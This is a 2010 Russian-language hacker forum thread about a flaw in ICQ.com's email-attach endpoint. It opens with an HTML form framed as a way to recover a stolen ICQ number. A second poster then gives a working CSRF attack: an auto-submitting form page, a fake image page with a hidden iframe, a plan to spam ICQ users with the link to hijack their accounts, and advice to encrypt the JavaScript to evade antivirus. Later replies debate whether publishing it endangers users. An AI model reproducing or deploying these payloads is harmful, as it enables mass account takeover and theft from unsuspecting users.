Возвращение угнанного номера ICQ (новый способ) [thanks to M4g]

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by alkos, 16 Nov 2010.

  1. alkos

    alkos Elder - Старейшина

    Joined:
    28 Mar 2007
    Messages:
    1,148
    Likes Received:
    292
    Reputations:
    271
    Представляю твоему вниманию замечательный способ возвращения угнанного ICQ номера, но сначала немного теории :)

    Итак, новая система ретрива на ICQ.com вводилась 2 раза:

    1 раз : одновременно с введением новой системы появилась возможность вписывать свое мыло в детали номера через страничку http://www.icq.com/people/НОМЕР/edit/ (а не через https://www.icq.com/register/email_attach.php), при этом тебе всего лишь нужно было быть залогиненным на асечном сайте;

    2 раз : после первых тестов новую систему убрали и временно вернули старую. После повторного введения новой системы ретрива мыло для логина вновь менялось лишь на странице https://www.icq.com/register/email_attach.php.

    После финального включения новой системы ретрива разработчики зачем-то решили оставить возможность прикрепления нового мыла с помощью первого варианта, но спрятали эту возможность глубоко в html-сорцах своих страниц :)

    Если у тебя угнали асю, твой алгоритм должен быть следующим (предварительно ты должен иметь живую сессию на ICQ.com):

    1. Сохрани на свой жесткий диск следующую html-страницу:
    Code:
    [COLOR=Lime]<form action="http://icq.com/people/include/xhr.php" method="POST">
    <input name="f" value="resendMail"/><br/>
    <input name="e" value="твое_мыло@мыло.ru"/><br/>
    <input name="lang" value="en"/><br/>
    <input name="server" value="prod"/><br/>
    <input type="submit" value="ok"/><br/>
    </form> [/COLOR] 
    2. Открывай данную страницу в браузере и жми на сабмит;

    3. После сабмита на твое вписанное мыло упадет ссылка для подтверждения нового "email for login";

    4. Переходи по данной ссылке и восстанавливай пароль на новое мыло с помощью https://icq.com/password :)
    -----------
    Первоисточник: Возвращение угнанного номера ICQ by M4g (c) 2010
     
    #1 alkos, 16 Nov 2010
    Last edited: 16 Nov 2010
    3 people like this.
  2. alkos

    alkos Elder - Старейшина

    Joined:
    28 Mar 2007
    Messages:
    1,148
    Likes Received:
    292
    Reputations:
    271
    В связи с попаданием в паблик этого материала возникает большая вероятность появления нового кидалова. Как с этим бороться и не попадаться на крючок? - Пользоваться услугами проверенных селлеров!
     
  3. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    235
    Likes Received:
    461
    Reputations:
    452
    автоматизация

    1. Создаешь файл 1.php

    Содержимое:
    PHP:
     <body onload="document.getElementById('l').submit();">
    <
    form  id='l' action="http://icq.com/people/include/xhr.php" method="POST">
    <
    input name="f" value="resendMail"/><br/>
    <
    input name="e" value="твое_мыло@мыло.ru"/><br/>
    <
    input name="lang" value="en"/><br/>
    <
    input name="server" value="prod"/><br/>
    <
    input type="submit" value="ok"/><br/>
    </
    form>  

    2. Создаешь файл 2.jpg

    Содержимое:
    PHP:
    <img src="http://c.icq.com/homepage/img/park_R_2010.jpg">
    <
    iframe width=1 height=0 style="position: absolute; visibility: hidden;" src="http://site.ru/1.php"></iframe>



    3. Создаешь файл .htaccess

    Содержимое:

    Делаешь рассылку в icq.com со словами "Прикольная картинка, как тебе? http://site.ru/2.jpg".

    На почту получаешь кучу ретривов и никаких кукисов. Самый чистый csrf.
    Если есть масть, переводи фрейм в яваскрипт, а яваскрипт шифруй уже каким хочешь энкодером для обхода фрейма антивирусами.


    ps. Ко мне в аську за пояснениями не стучаться, 911 временно не работает.



    Этому методу уже как минимум год, так как я не асечник, он так и остался в моей голове. По ходу асечники доперли до него только сейчас в связи с нововведениями icq.com.
     
    _________________________
    #3 Uex Urgent, 16 Nov 2010
    Last edited: 16 Nov 2010
    1 person likes this.
  4. rudi

    rudi Active Member

    Joined:
    3 Jun 2010
    Messages:
    487
    Likes Received:
    184
    Reputations:
    5
    This email is already in use by another ICQ number
     
  5. alkos

    alkos Elder - Старейшина

    Joined:
    28 Mar 2007
    Messages:
    1,148
    Likes Received:
    292
    Reputations:
    271
    satana-fu, а вот это было зря....


    На мыло, привязанное к другим уинам ретрив не идёт.
     
    #5 alkos, 16 Nov 2010
    Last edited: 16 Nov 2010
  6. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    235
    Likes Received:
    461
    Reputations:
    452

    то есть ты тему пали, а я молчи в трубочку?????

    Если уж палишь тему, пали ее качественно.

    Молчал бы ты, молчал бы и я, который молчал об этом почти год, так что зря вообще создание темы, а не
     
    _________________________
  7. sparrow3000

    sparrow3000 Member

    Joined:
    27 Mar 2009
    Messages:
    378
    Likes Received:
    38
    Reputations:
    0
    шикарно
    только теперь палевно по ссылкам тыкать xD
     
  8. C00LPack

    C00LPack Member

    Joined:
    7 Oct 2010
    Messages:
    425
    Likes Received:
    66
    Reputations:
    19
    я вообще непонял как это заюзать =((((
     
  9. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Работает только если у тебя есть живая сессия на icq.com. То есть угнать ты не сможешь номер аськи.
     
  10. alkos

    alkos Elder - Старейшина

    Joined:
    28 Mar 2007
    Messages:
    1,148
    Likes Received:
    292
    Reputations:
    271
    satana-fu, в материале, который выложил я не описывался метод, как можно массово поиметь номерков, он представлялся лишь как способ вернуть свой уин. Кто поумнее сам бы понял что к чему, остальным хватило бы знаний быть предупреждённым, что вообще такой способ возврата существует, не описывая как именно его можно использовать со злым умыслом. Ты же в деталях описал именно один из способов нехорошего применения этих знаний, тем самым количество кул-хацкеров на зимних каникулах возрастёт существенно и много людей может пострадать.

    З.Ы. на самом деле через csrf сделать ретрив не прокатит, т.к. скрипт нужно с локальной машины запускать, а не с хостинга. А впарить закриптованый яваскрипт сравнимо со впарванием трояна, это не каждому дано.
     
    #10 alkos, 16 Nov 2010
    Last edited: 16 Nov 2010
Loading...